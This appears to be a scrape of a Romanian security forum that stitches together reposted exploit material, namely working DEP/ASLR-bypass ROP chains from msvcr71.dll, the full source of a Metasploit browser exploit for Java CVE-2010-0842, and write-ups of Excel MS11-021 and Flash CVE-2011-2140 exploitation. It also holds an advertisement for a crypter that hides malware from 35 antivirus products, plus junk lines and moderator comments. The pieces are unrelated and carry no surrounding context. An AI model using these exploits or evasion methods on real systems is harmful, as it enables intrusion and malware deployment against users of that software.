0x7C3410C2) # pop ecx;pop ecx;ret; depBypass += pack('<L', 0x7C342462) # xor chain; call eax {0x7C3410C2} depBypass += pack('<L', 0x7C38C510) # writeable location for lpflOldProtect depBypass += pack('<L', 0x7C365645) # pop esi;ret; depBypass += pack('<L', 0x7C345243) # ret; depBypass += pack('<L', 0x7C348F46) # pop ebp;ret; depBypass += pack('<L', 0x7C3487EC) # call eax depBypass += pack('<L', 0x7C344CC1) # pop eax;ret; depBypass += pack("<i", -size) # {size} depBypass += pack('<L', 0x7C34D749) # neg eax;ret; {adjust size} depBypass += pack('<L', 0x7C3458AA) # add ebx, eax;ret; {size into ebx} depBypass += pack('<L', 0x7C3439FA) # pop edx;ret; depBypass += pack('<L', 0xFFFFFFC0) # {flag} depBypass += pack('<L', 0x7C351EB1) # neg edx;ret; {adjust flag} depBypass += pack('<L', 0x7C354648) # pop edi;ret; depBypass += pack('<L', 0x7C3530EA) # mov eax,[eax];ret; depBypass += pack('<L', 0x7C344CC1) # pop eax;ret; depBypass += pack('<L', 0x7C37A181) # (VP RVA + 30) - {0xEF adjustment} depBypass += pack('<L', 0x7C355AEB) # sub eax,30;ret; depBypass += pack('<L', 0x7C378C81) # pushad; add al,0xef; ret; depBypass += pack('<L', 0x7C36683F) # push esp;ret; print "WP> Universal Bypass Size: %d bytes"%len(depBypass) return depBypass (22 dwords) Triggered by the Metasploit bounty "incident", the fact that Abysssec published a post/document just a few hours ago, and because Immunity already released the routine, I decided to take a look myself & see if there would be another way to build an alternative DEP/ASLR Bypass routine from msvcr71.dll. [h=2]The alternative version (mona.py)[/h] I attached Immunity Debugger to an application that has the dll loaded, and used mona.py to create a database with rop gadgets & have it produce a rop chain. Since the one written part of White Phosporus doesn’t have any null bytes, I will try to do the same thing. This is the result : Command used : 17 seconds later, I got this : rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (msvcr71.dll) 0x7c37a140, # <- *&VirtualProtect() 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (msvcr71.dll) 0x????????, # ** <- find routine to move virtualprotect() into esi # ** Hint : look for mov [esp+offset],eax and pop esi 0x7c376402, # POP EBP # RETN (msvcr71.dll) 0x7c345c30, # ptr to 'push esp # ret ' (from msvcr71.dll) 0x7c346c0a, # POP EAX # RETN (msvcr71.dll) 0xfffffdff, # value to negate, target value : 0x00000201, target: ebx 0x7c351e05, # NEG EAX # RETN (msvcr71.dll) 0x7c354901, # POP EBX # RETN (msvcr71.dll) 0xffffffff, # pop value into ebx 0x7c345255, # INC EBX # FPATAN # RETN (msvcr71.dll) 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (msvcr71.dll) 0x7c34d201, # POP ECX # RETN (msvcr71.dll) 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) 0x7c34b8d7, # POP EDI # RETN (msvcr71.dll) 0x7c34b8d8, # ROP NOP (-> edi) 0x7c344f87, # POP EDX # RETN (msvcr71.dll) 0xffffffc0, # value to negate, target value : 0x00000040, target: edx 0x7c351eb1, # NEG EDX # RETN (msvcr71.dll) 0x7c346c0a, # POP EAX # RETN (msvcr71.dll) 0x90909090, # NOPS (-> eax) 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (msvcr71.dll) # rop chain generated by mona.py # note : this chain may not work out of the box # you may have to change order or fix some gadgets, # but it should give you a head start ].pack("V*") Interesting… mona.py generated an almost complete ROP chain using gadgets using pointers from msvcr71.dll. It is slightly larger than the one written by Immunity (so yes, the one part of WP is most likely better), but I just wanted to see if there was an alternative available. The only thing that is missing from the one mona generated, is a routine that would put the VirtualProtect() (in eax) into esi. mona.py didn’t find any obvious gadgets that would simply do something such as "mov esi,eax", so I had to manually search for an alternative. But as mona.py suggested, I simply had to find a gadget that would write the value in eax onto the stack, so you can pick it up in esi later on. In order to do so, you probably need 2 or 3 gadgets : one to get the stack pointer, a second one to write the value onto the stack and a third one to pick it up (pop esi). After searching the generated rop.txt file for a few minutes, I found the following 2 gadgets that will do this : 0x7c37591f : # PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN That should work. Using those 2 gadgets, we can simply write the pointer to VirtualProtect() onto the stack and pick it up in ESI. In fact, the second gadget will write and pick up in the same gadget. We just need to make ECX point at the correct location on the stack and make sure POP ESI will take it from that location. Note that the first gadget requires EAX to contain a valid pointer to a readable location. So all we would have to do to make it readable is pop a readable address from msvcr71.dll into EAX first. Putting all of this together, the chain looks like this : rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # Make EAX readable 0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) 0x41414141, # EBP (filler) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # <- *&VirtualProtect() 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) 0x7c346c0b, # Slide, so next gadget would write to correct stack location 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) 0x41414141, # EDI (filler) 0x41414141, # will be patched at runtime (VP), then picked up into ESI 0x41414141, # EBX (filler) 0x7c376402, # POP EBP # RETN (msvcr71.dll) 0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0xfffffdff, # size 0x00000201 -> ebx, modify if needed 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll) 0x7c354901, # POP EBX # RETN (MSVCR71.dll) 0xffffffff, # pop value into ebx 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll) 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) 0x7c34d201, # POP ECX # RETN (MSVCR71.dll) 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll) 0x7c34b8d8, # ROP NOP (-> edi) 0x7c344f87, # POP EDX # RETN (MSVCR71.dll) 0xffffffc0, # value to negate, target value : 0x00000040, target: edx 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll) 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x90909090, # NOPS (-> eax) 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) # rop chain generated with mona.py ].pack("V*") 31 dwords… 9 dwords larger than the commercial one from White Phosphorus… but it proves my point. It took me less than 10 minutes to build this chain, it’s universal and bypasses DEP and ASLR. Oh, by the way, in case you didn’t know… if you have other bad chars (so let’s say you also need to avoid using ‘\x0a’ and ‘\x0d’) then you could just run and get other pointers… yes, it’s that simple. !mona rop -m msvcr71.dll -n -cpb '\x0a\x0d' [h=2]Conclusion[/h] no matter how nice & ‘tempting’ a certain solution looks like, there always might be an alternative, and creativity often leads to results. © 2011, Corelan Team (corelanc0d3r). All rights reserved. Vedeti la sursa, futui grijania masii de vbulletin, nu dati bai pe cacatul asta. Sursa: https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/

Wi-Fi Security with Wi-Fi Protection Plus Ajin Abraham, Joseph Sebastian Vimal Jyothi Engineering College. ajin25 @ gmail.com +91-9633325997 josephs_18 @ live.com +91-9495587202 Abstract Current Industrial standards of Wi-Fi security are found to have security loop holes, making it possible for hackers to break it. So we consider the possibility of a new technology for Wi-Fi security. We call it Wi-Fi P+ or Wireless Fidelity Protection Plus Introduction Wi-Fi is common nowadays. Every educational institutions and business organizations has got their perimeter covered in Wi-Fi. All the confidential data being transmitted through Wi-Fi, makes it a target for Hackers. To secure it, some Wi-Fi security standards like WEP, WPA, and WPA2 are introduced. Each of them is introduced when the previous security architecture was found to be a failure. But in present situation all of these industrial standard Wi Fi security architectures are found to have vulnerabilities so that a hacker can hack into the Wi Fi network. Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18486.pdf

[h=1]Java MixerSequencer Object GM_Song Structure Handling Vulnerability[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Java MixerSequencer Object GM_Song Structure Handling Vulnerability", 'Description' => %q{ This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability "ebx" points to a fake event in the MIDI file which stores the shellcode. A "jmp ebx" from msvcr71.dll is used to make the exploit reliable over java updates. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peter Vreugdenhil', # Vulnerability Discovery and exploit 'juan vazquez', # Metasploit module ], 'References' => [ [ 'CVE', '2010-0842' ], [ 'OSVDB', '63493'], [ 'BID', '39077'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-060/' ], [ 'URL', 'http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/'] ], 'Payload' => { 'Space' => 8000, }, 'DefaultOptions' => { 'EXITFUNC' => "process", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ # Tested succesfully on: # Windows XP SP3 / IE 6 / Java 6u18 # Windows XP SP3 / IE 7 / Java 6u18 # Windows XP SP3 / IE 8 / Java 6u18 # Windows XP SP3 / Firefox 7.0.1 / Java 6u18 # Windows XP SP3 / IE 8 / Java 6u17 # Windows XP SP3 / Firefox 7.0.1 / Java 6u17 # Windows 7 / IE 8 / Java 6u18 'Windows / Java 6 <=u18', { 'Ret' => 0x7C35A78D # jmp ebx # msvcr71.dll } ], ], 'Privileged' => false, 'DisclosureDate' => "Mar 30 2010", 'DefaultTarget' => 0)) end def get_rmf rmf_header = "" rmf_header << "IREZ" # RMFHeaderMagic rmf_header << "\x00\x00\x00\x01" # RMFVersionNumber rmf_header << "\x00\x00\x00\x02" # NumberOfRMFBlocks song_block = "" song_block << "\x00\x00\x00\x65" # OffsetToNextBlock song_block << "SONG" # BlockType song_block << [target.ret].pack("N") # BlockID song_block << "\x00" # BlockName song_block << "\x00\x00\x00\x47" # BlockDataSize song_block << "\x7F\xFF\x00\x01\x00\x00\x01\x01" # BlockData song_block << "\x00\x00\x00\x04\x00\x1C\x00\x08" # BlockData song_block << "\x00\x7F\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x00\x00\x00\x00\x00\x00\x00" # BlockData song_block << "\x00\x01\x54\x49\x54\x4C\x9F\xB1" # BlockData song_block << "\xB5\x0D\x0A\x7E\xFB\x70\x9C\x86" # BlockData song_block << "\xFE\xB0\x35\x93\xE2\x5E\xDE\xF7" # BlockData midi = "" # HEADERCHUNK Header midi << "MThd" # Header midi << "\x00\x00\x00\x06" # Chunk size midi << "\x00\x01" # Format Type midi << "\x00\x01" # Number of tracks midi << "\x00\x08" # Time division # TRACKCHUNK header midi << "MTrk" # Header midi << "\x00\x00\x24\xd7" # Length midi << "\x00\xb0\x80\x00" # Controller Event # Triggers the vulnerability # Fake Midi Meta event - Shellcode midi << "\x38" # Variable lenght delta time midi << "\xff" # Midi meta event midi << "\x02" # Meta event type 02 => Copyright notice midi << "\xc9\x50" # Variable Meta Event Length midi << payload.encoded midi << rand_text(9123 - payload.encoded.length) midi_block = "\x00\x00\x25\x60" # OffsetToNextBlock midi_block << "Midi" # BlockType midi_block << "\x00\x00\x7f\xff" # BlockID midi_block << "\x00" # BlockName midi_block << "\x00\x00\x24\xed" # BlockDataSize midi_block << midi # BlockData rmf = "" rmf << rmf_header rmf << song_block rmf << midi_block rmf_name = "#{rand_text_alpha(rand(5) + 3)}.rmf" return rmf_name, rmf end def get_jar files = [ [ "MyController.class" ], [ "MixerMidiApplet.class" ], [ "META-INF", "services", "javax.sound.midi.spi.MidiDeviceProvider" ] ] jar = Rex::Zip::Jar.new jar.add_file("META-INF/", "") jar.add_file("META-INF/services/", "") jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-0842")) jar.build_manifest jar_name = "#{rand_text_alpha(rand(5) + 3)}.jar" return jar_name, jar end def on_request_uri(cli, request) if request.uri =~ /\.jar$/i print_status("Sending JAR file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, @jar.pack, {'Content-Type'=>'application/octet-strem'}) return end if request.uri =~ /\.rmf$/i print_status("Sending RMF file to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, @rmf, {'Content-Type'=>'application/octet-strem'}) return end base_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource rmf_uri = base_uri + "/#{@rmf_name}" jar_uri = base_uri + "/#{@jar_name}" html = %Q| <html> <head> </head> <body> <applet code="MixerMidiApplet.class" archive="#{jar_uri}" width=350 height=200> <param name="midifile" valuetype="ref" value="#{rmf_uri}"> </applet> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @jar_name, @jar = get_jar @rmf_name, @rmf = get_rmf super end end Sursa: Java MixerSequencer Object GM_Song Structure Handling Vulnerability

[h=2]Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021)[/h]Posted by shahin in Exploits / BUG Decryption hello all as we didn’t publish any exploit for a bit we just going to release. [h=2]1) Advisory information[/h] Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability Vendor : Microsoft Corporation: Software, Smartphones, Online, Games, Cloud Computing, IT Business Technology, Downloads Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec Microsoft : A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files.An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. [h=2]2) Vulnerability detail[/h] each excel file can contain multiple BOF (2057) records . This record specifies the first substream associated with workbook.One of the fields in these records, specify substream recordd to come with. This field can be extracted from sub_3018F0C2 function. .text:301A0C87 push [ebp+arg_2C] .text:301A0C8A mov ecx, [ebp+var_14] .text:301A0C8D push 1 .text:301A0C8F call sub_3018F0C2 .text:301A0C94 mov ecx, eax .text:301A0C96 mov eax, [ebp+arg_24] .text:301A0C99 cmp eax, ebx .text:301A0C9B mov [ebp+var_10], ecx .text:301A0C9E jz short loc_301A0CA2 .text:301A0CA0 mov [eax], ecx If the field value is equal with 400, sub_3019DFBA function is called to check file type. if file type is xls EXCEL.exe will display a message If approved it will continue to run the code.if you change file extension to xlb there will be any message. After this step sub_3053F626 function will be executed. This function will parse the next BOF records. .text:304D4E9D cmp [ebp+arg_20], ebx .text:304D4EA0 jnz short loc_304D4EC6 .text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h .text:304D4EAC jnz short loc_304D4EC6 .text:304D4EAE mov edx, [ebp+arg_C] .text:304D4EB1 mov ecx, [ebp+arg_8] .text:304D4EB4 push 3Fh .text:304D4EB6 call sub_3019DFBA .text:304D4EBB cmp eax, ebx .text:304D4EBD mov [ebp+var_8], eax .text:304D4EC0 jz loc_304D4FD3 .text:304D4EC6 .text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j .text:304D4EC6 ; sub_301A0BC7+3342E5j .text:304D4EC6 push ebx .text:304D4EC7 push dword_30EB89A4 .text:304D4ECD push [ebp+var_C] .text:304D4ED0 call sub_3053F626 .text:304D4ED5 cmp dword_30F5E64C, ebx .text:304D4EDB mov [ebp+var_8], eax .text:304D4EDE jz short loc_304D4EE7 .text:304D4EE0 cmp eax, ebx .text:304D4EE2 jz short loc_304D4EE7 one of records may come after BOF,is undocumented record which have record type equal to 0xA7 (167). for truly parsing this record should come with another record with 0x3C (60) record type. if it meet this requirement the length of records will be read and copied to the stack the function which operation of copying data records in the stack is sub_30199E55. This function takes three arguments .The first argument specifies the number of bytes to copy, which will read from file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data can be copied. values of the second and third arguments based on the amount of computing reading from file and into this cumpoting,computational error which may occur here … .text:3053F830 call sub_301A0A01 .text:3053F835 cmp eax, 3Ch .text:3053F838 mov [ebp+var_ED4], eax .text:3053F83E jnz loc_30540488 .text:3053F844 call sub_301A0A01 .text:3053F849 mov ecx, [ebp+var_EDC] .text:3053F84F imul ecx, [ebp+var_F00] .text:3053F856 mov edi, eax .text:3053F858 mov eax, [ebp+var_EE0] .text:3053F85E lea ebx, [ecx+eax+3] .text:3053F862 call sub_301A0ABE .text:3053F867 push 0FFFFFFFDh .text:3053F869 pop edx .text:3053F86A sub edx, ecx .text:3053F86C add eax, edx .text:3053F86E push eax ; Dst .text:3053F86F push ebx ; int .text:3053F870 mov eax, edi .text:3053F872 call sub_30199E55 the vulnerability that exists here is that we can change the value of parameter 3 whith our own values. program will not correcly controll third argument of sub_30199E55 this and can result in the desired amount and location of desired data can overwrite in the stack. .text:30199E60 cmp edi, [esp+4+Dst] .text:30199E64 ja loc_303EE1B7 .text:30199E6A mov ecx, [esp+4+arg_0] .text:30199E6E push ebx .text:30199E6F mov ebx, dword_30F726C0 .text:30199E75 push ebp .text:30199E76 mov ebp, nNumberOfBytesToRead .text:30199E7C push esi .text:30199E7D mov [esp+10h+Dst], ecx .... .text:30199E93 mov eax, [esp+10h+Dst] .text:30199E97 push esi ; Size .text:30199E98 lea edx, dword_30F6E6B8[ebx] .text:30199E9E push edx ; Src .text:30199E9F push eax ; Dst .text:30199EA0 sub edi, esi .text:30199EA2 call memcpy .text:30199EA7 add [esp+1Ch+Dst], esi .text:30199EAB add ebx, esi .text:30199EAD add esp, 0Ch .text:30199EB0 test edi, edi .text:30199EB2 mov dword_30F726C0, ebx .text:30199EB8 jnz loc_301E0DB3 [h=2]3) Exploitation :[/h] Stack overflows are not hard to exploit at all ! but as we have both /GS , SAFESEH here. because given that we are destined to memcpy we can change it so that it begins to overwrite the stack after GS. and from there when the return comes , our values contained in the ESP and we can call it with simple call esp and game is over !!! [h=6]download full exploit source : MS11-021[/h] Happy Hacking . Sursa: Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021) | Abysssec Security Research

[h=2]bypassing all anti-virus in the world (Good Bye Detection , Hello Infection)[/h]Posted by shahin in news, Pen-test Method, reversing hello to all readers [h=2]Introduction[/h] as you may read in @abysssec in twitter actually in past a few months we did a cool research on bypassing anti-viruses and got really great result . Bypassing anti-viruses is not a new topic and it’s still about encrypting / decrypting of a program to being hide from AV eyes. In past it was really, really easy task to do but AV’s getting smarter and bypassing all anti-viruses with some really unique methods that each of them use is not funny and neither easy to do. before i go feature i like to have a simple glossary for unfamiliar readers. [h=2]Glossary[/h] Crypter : the program (mostly GUI) will crypt the malware / bot to make it hide from anti-viruses Stub : the Decryptor of crypted program FUD : Fully Un Detectable (FUD = no AV detect) RUNPE : run the PE without headers in memory USG : unique stub generator. (make unique stubs) Binder: will join two file will drop in hdd or mem Pumper: will increase size of tool EOF : end of file(in crypter it need to preserve) Cloner : will clone the file (Decryptor like in HDD) Icon Changer: will change the final exe icon well there are two also different kind of crypters scan time and run time. The good crypter is run time one because as it name says the scan time crypter is just FUD at scan time and when you run it and after real malware decrypted it will be detect so not that useful. And the real crypter is the runtime one. [h=2]How it works ?[/h] if we remove all complex technical info for bypassing all 35 anti-virus around the world it works really sample. it simply encrypt program, decrypt, and then run it in memory. encryption algorithm is not important and sample ideas are enough to make a crypter fud but some of mostly used alghortims are : I. RC4 II. AES III.DES IV. TEA V. XOR VI. CryptoAPI VII. blowfish note that there is important part in your job and that is run the malware safely in memory after decrypting it , and this is done by RunPE . the idea of RunPE comes from great PoC by Tan Chew Keong called dynamic forking of win32 exe : SIG^2 G-TEC - Dynamic Forking of Win32 EXE steps and idea are really sample : CreateProcess Find Base address Virtualalloc Align sections Fix thread context Resume thread but this is not easy to hide this kind of API chaining from anti-viruses . so we finished our research by writing a new fud crypter and our crypter is unique and different with public ones . our crypter is unique and can bypass all 35 exist av right now . here is list of AV we fully tested our crypters on them . - Ad-Aware - AhnLab V3 Internet Security - ArcaVir - Avast - Avast 5 - AVG Free - AntiVir (Avira) - BitDefender - BullGuard - VirusBuster Internet Security - Clam Antivirus - COMODO Internet Security - Dr.Web - eTrust-Vet - F-PROT Antivirus - F-Secure Internet Security - G Data - IKARUS Security - Kaspersky Antivirus - McAfee - MS Security Essentials - ESET NOD32 - Norman - Norton Antivirus - Panda Security - A-Squared - Quick Heal Antivirus - Rising Antivirus - Solo Antivirus - Sophos - Trend Micro Internet Security - VBA32 Antivirus - Vexira Antivirus - Webroot Internet Security - Zoner AntiVirus we even tested 10 year ago malware and our crypter can hide them from any anti-virus system . our crypter comes with some unique features here is some of them - FUD 0 / 35 detection - EOF support - Coded in C/ASM Stub and GUI In C# - Compatible with Win 2k/XP/7 x32 and x64 - Ability of bypassing heuristic and emulators (Kaspersky pro-acvtive defense , Nod32 advanced heuristic , Norton Sonar, Avira heuristic) - Command line support - Unicode support (chines , russian and so on) - Right-to-Left Exploit after crypting you can have .mp3 , doc , pdf , avi or anything as output !!! - inbuilt scanner and scanning with 35 anti-virus after cryptring - advanced file binder with drop in disk and memory - Anti-debug - Anti-sandbox - advanced encryption : Double XOR , RC4, AES256 - Advanced resource storage : unique method here is some screen shot of GUI : and finally you can see the actual work in a demo here : http://abysssec.com/files/VampCrypt.rar as we don’t want harm anyone if you are : - penetration testing company - anti virus / IDS company - any legit company who needs it ” please note that WE DON”T give tool / technology to PERSON . ONLY VERIFIED COMPANY ” contact : info [at] abysssec.com and as always you can follow @abysssec in twitter happy fudding . Sursa: bypassing all anti-virus in the world (Good Bye Detection , Hello Infection) | Abysssec Security Research

[h=2]Exploiting CVE-2011-2140 another flash player vulnerability[/h]Posted by shahin hello all . before going future we are sorry to not update blog regularly, but it’s due to we are busy with stack of projects and also working on our expert training courses. so as we didn’t post any blog post here we go with another flash player exploit we wrote long time ago. [h=1]1) Advisory information[/h] [TABLE] [TR] [TD=width: 638] Title : Adobe flash player memory overwrite exploit Version : <= 10.3.186.3 Discovery : Zero Day Initiative Vendor : http://adobe.com Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec [/TD] [/TR] [/TABLE] [h=1]2) Vulnerability Information[/h] [TABLE] [TR] [TD=width: 638]Class 1- Stack OverwriteImpactSuccessfully exploiting this issue allows remote attackers to gain code execution on vulnerable system Remotely Exploitable Yes Locally Exploitable Yes [/TD] [/TR] [/TABLE] [h=1]3) Vulnerabilities detail[/h] [h=2]1- Stack overwrite vulnerability[/h] Before we go deep into the vulnerability for understanding this vulnerability you should take a look at MP4 format and H.264/AVC data structures.The actual vulnerability occurs during processing data units in Sequence Parameter Set in MP4. Sub_1005B396 function, is responsible for processing Sequence Parameter Set. In this function pic_order_cnt_type from SPS will be check, if it’s equal with 1, other fields like data_pic_order_always_zero_flag , offset_for_non_ref_pic , offset_for_top_to_bottom_field will be initialize : [TABLE] [TR] [TD=width: 638].text:1005B396 sub_1005B396 proc near ; CODE XREF: sub_1005B8DB+4Bp.text:1005B397 push ebp.text:1005B398 push esi.text:1005B399 push edi .text:1005B39A mov edi, ecx .text:1005B39C call sub_1005A95B .text:1005B3A1 mov esi, [esp+10h+arg_0] .text:1005B3A5 mov ecx, edi .text:1005B3A7 mov [esi], al … .text:1005B47D mov ecx, edi .text:1005B47F mov [esi+20h], eax .text:1005B482 call sub_1005AA64 .text:1005B487 mov [esi+40h], eax .text:1005B48A cmp eax, ebp à if( pic_order_cnt_type ) .text:1005B48C jnz short loc_1005B49D … .text:1005B49D loc_1005B49D: ; CODE XREF: sub_1005B396+F6j .text:1005B49D xor ebx, ebx .text:1005B49F inc ebx .text:1005B4A0 cmp eax, ebx à if( pic_order_cnt_type == 1 ) .text:1005B4A2 jnz short loc_1005B4EF .text:1005B4A4 mov ecx, edi .text:1005B4A6 call sub_1005A99A à offset_for_top_to_bottom_field .text:1005B4AB mov ecx, edi .text:1005B4AD mov [esi+48h], al .text:1005B4B0 call sub_1005AA93 à offset_for_non_ref_pic .text:1005B4B5 mov ecx, edi .text:1005B4B7 mov [esi+54h], eax .text:1005B4BA call sub_1005AA93 à offset_for_top_to_bottom_field [/TD] [/TR] [/TABLE] Then the num_ref_frames_in_pic_order_cnt_cycle will be set and if it’s bigger than 0 the values in offset_for_ref_frame will be copied into buffer. [TABLE] [TR] [TD=width: 638]text:1005B4BF mov ecx, edi.text:1005B4C1 mov [esi+50h], eax.text:1005B4C4 call sub_1005AA64 à num_ref_frames_in_pic_order_cnt_cycle.text:1005B4C9 mov [esi+4Ch], eax .text:1005B4CC test eax, eax .text:1005B4CE jbe short loc_1005B4EF .text:1005B4D0 lea eax, [esi+58h] .text:1005B4D3 mov [esp+10h+arg_0], eax .text:1005B4D7 .text:1005B4D7 loc_1005B4D7: à do{ .text:1005B4D7 mov ecx, edi .text:1005B4D9 call sub_1005AA93 à offset_for_ref_frame .text:1005B4DE mov ecx, [esp+10h+arg_0] .text:1005B4E2 add [esp+10h+arg_0], 4 à buf = &buf + 4 .text:1005B4E7 inc ebp à i++ .text:1005B4E8 mov [ecx], eax à buf = offset_for_ref_frame .text:1005B4EA cmp ebp, [esi+4Ch] .text:1005B4ED jb short loc_1005B4D7 à } while(i < num_ref_frames_…) [/TD] [/TR] [/TABLE] You should got the vulnerability at this point. There is no boundary check for num_ref_frames_in_pic_order_cnt_cycle, so our data related to offset_for_ref_frame will be copy into the stack , that’s all . [h=2]2- Exploitation[/h] Thanks to windows memory manager, browser and class of bug it’s not that hard to archive RCE. The only thing that should care about is return address. Because values which copied from MP4 file into stack, come with the changes. In other words, these values ??after reading from file will be decode and then are copied into stack. Values ??are copied into the buffer are generated from values in file into Signed Exp-Golomb code.After taking controll of EIP it’s easy to finish the job we used basic heap spray. here is reliable exploit : CVE-2011-2140 happy hunting ! Sursa: Exploiting CVE-2011-2140 another flash player vulnerability | Abysssec Security Research

dsfsdfdsfdsfdsf

ghjghj

Da, interesanta idee, poate fi foarte utila o astfel de utilitate.

Avem o categorie numita "Cos de gunoi" unde mutam toate porcariile. Tu ai postat niste link-uri de 2 lei, nu vad ce ar cauta asa ceva la Show-Off. Ai extras macar versiunea bazei de date? Intrati pe un link, puneti o ghilimea si sunteti 1337.Sau puneti acel link in Havij si sunteti 31337. O sa dau ban pentru astfel de porcarii.